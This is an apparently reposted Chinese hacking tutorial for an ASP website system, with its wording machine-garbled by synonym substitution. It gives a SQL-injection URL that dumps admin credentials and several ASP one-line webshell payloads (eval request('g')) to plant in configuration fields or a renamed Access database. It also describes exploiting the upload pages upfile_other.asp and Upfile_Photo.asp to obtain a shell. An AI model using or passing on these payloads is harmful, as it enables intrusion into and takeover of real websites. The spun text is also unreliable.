小正落客

2019-11-27 01:28 来源:原创 网络编辑:admin 阅读 报错

  ( 爆办员帐号稠密码的代码 )

  NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

  ( 壹句子话木马的妙用 )

  拔出产壹句子话木马后,衔接网站的配备文件:inc/config.asp 稠密码邑是g

  1.网站配备-容许的上传文件典型-拔出产合合的壹句子话木马:"%><%eval request("g")%><%s=" 不行就添加以壹个cer程式,之后上传cer程式的木马即却

  2.网站配备-网站地址-拔出产合合的壹句子话木马:http://"%><%execute(request("g"))%><%'

  3.网站配备-网站名称-拔出产合合的壹句子话木马:沧州临港彩越募化工拥有限公司"%><%eval request("g")%><%s="

  4.网站配备-版权信息-拔出产合合的壹句子话木马:"%><%eval(request(chr(103)))%><%'

  5.本方法使用于access数据库,条需在access数据库任何中拔出产:┼攠數畣整顿爠煥敵瑳∨≡┩> 又将mdb备份成asp容许asa,拜候此雕刻个asp或asa,坚硬是壹句子话木马。

  ( 使用upfile_other.asp破开绽拿shell )

  直接拜候会员中心:userreg.asp

  报户口壹个用户并在不参加以登录的样儿子下,运用副文件上传器趾以爆它菊花,以下代码管为1.html,并外面面的修改目的站,第壹个上传jpg,第二个上传cer

  

  

  佩的却以使用会员中心的cookies,用火狐阅读器登陆之后,拜候upfile_other.asp页面,用抓包器去抓包,接着用皓小儿子上传拿shell.

  ( 上传破开绽 )

  破开绽文件:Upfile_Photo.asp

  前提是进入后盾了,拜候此雕刻个文件,将提示“请先选择你要上传的文件!”,用抓包器抓办员的cookies,又把上传地址跟cookies掷到名小儿子里上传拿shell

关键词:

分享到:
至顶 反馈 至底